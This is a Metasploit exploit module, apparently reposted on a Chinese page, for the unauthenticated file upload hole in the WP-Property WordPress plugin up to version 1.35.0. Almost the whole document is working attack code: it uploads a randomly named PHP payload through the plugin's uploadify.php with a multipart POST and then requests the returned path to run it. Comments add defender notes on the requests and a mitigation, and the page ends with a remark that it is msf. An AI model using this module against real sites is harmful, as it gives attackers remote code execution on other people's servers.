WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

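# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the description below).
#
# The listing on this page was corrupted by extraction residue: stray
# characters were interleaved with the code and the PhpEXE mixin name was
# mangled to `Msf::Exploit:hpEXE`. Both are repaired here; the request logic
# is unchanged.
#
# Defender notes, taken from the requests this module issues:
# * Every request targets
#   <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
# * The upload is a multipart POST with a `Filedata` part (file name: five
#   random letters plus ".php") and a `folder` part naming the uploadify
#   directory. It is followed by a GET for the path the server echoed back.
# * Mitigation: run a plugin release newer than the affected range and
#   remove or deny web access to the bundled uploadify.php.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, targets, disclosure date) and the
  # TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify.php with a single GET.
  #
  # NOTE(review): the verdict rests only on an HTTP 200 for that path. No
  # plugin version is read, so a fixed installation that still ships the file
  # is reported as "Appears" too. Treat the result as "endpoint reachable",
  # not as proof of exposure.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response or a
  #   non-200 status, Appears otherwise
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP file through uploadify.php, then requests the path that the
  # server returned in the upload response body.
  #
  # Fails with UnexpectedReply when the upload gets no response, a non-200
  # status, or a body that does not contain the generated file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # Helper from the PhpEXE mixin. Presumably :unlink_self makes the uploaded
    # stub delete itself after it runs. If so, web-server access logs are a
    # more dependable trace than files left on disk. Confirm against the mixin.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Strip the CRLF that precedes a boundary marker at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the follow-up request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end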

不要问我这写的是什么、怎么利用,我是说 msf。